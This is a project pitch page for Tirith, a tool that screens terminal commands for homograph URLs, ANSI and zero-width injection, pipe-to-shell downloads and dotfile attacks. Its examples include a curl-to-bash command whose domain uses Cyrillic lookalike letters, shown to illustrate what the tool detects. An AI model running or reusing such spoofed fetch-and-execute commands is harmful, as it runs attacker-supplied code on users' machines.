PitchHut logo
Log in / Sign up
Protects terminals from homograph and injection attacks.
Preview url
Visit project
Pitch

Tirith secures terminal commands by intercepting suspicious URLs and potential threats like homograph attacks and ANSI injections. With seamless integration and minimal performance impact, it ensures every command runs safely, leaving users free from worry without sacrificing efficiency.

Description

Tirith is a robust security tool designed to protect terminal users from various types of attacks that exploit weaknesses in URL handling and command execution. While modern web browsers have implemented measures against homograph and injection attacks, terminal environments remain vulnerable. Tirith serves as a critical line of defense, ensuring that every command executed is safe from threats such as:

  • Homograph Attacks: Detects visually similar URLs that can mislead users by using Cyrillic or Greek characters instead of Latin. For instance:

    curl -sSL https://install.example-cli.dev | bash  # safe
curl -sSL https://іnstall.example-clі.dev | bash  # compromised

  • ANSI and Terminal Injection: Guards against ANSI escape sequences and zero-width characters that might cause unexpected behavior or information disclosure within the terminal.

  • Pipe-to-Shell Threats: Alerts users to the risks associated with piped commands like curl | bash or wget | sh, informing them before executing potentially unsafe commands.

  • Dotfile and Ecosystem Attacks: Prevents unauthorized downloads targeting sensitive dotfiles and warns against untrusted package sources.

Key Features

  • Zero Friction Operation: Incorporates seamlessly into the command line environment with minimal performance impact, ensuring security without interrupting the normal workflow.

  • Local Analysis: All assessments are conducted locally, negating the need for network calls and ensuring privacy and speed. This also avoids any risk of exposing sensitive command data to external servers.

  • Customizable Policies: Users can configure rules through a YAML policy file, allowing tailored security settings to fit individual or organizational needs.

Example Usage

  1. Check a Command: Test a command for potential issues without executing it:

    tirith check -- curl -sSL https://іnstall.example-clі.dev | bash

  2. Analyze a URL: Understand the security signals associated with a URL:

    tirith score https://bit.ly/something

  3. Safe Downloading: Use tirith run for a secure alternative to curl | bash, which includes verification steps before executing potentially harmful scripts:

    tirith run https://get.docker.com

Installation

Tirith is easily installable via various package managers and supports multiple operating systems. After installation, it requires minimal configuration—simply add the initialization command to the shell profile:

eval "$(tirith init)"

Conclusion

Tirith is essential for anyone who frequently uses terminal commands to manage systems and deploy software, providing an additional layer of security that is critical in today's cybersecurity landscape. It reduces the risk of malicious attacks, ensuring that commands run are scrutinized for safety.

0 comments

No comments yet.

Sign in to be the first to comment.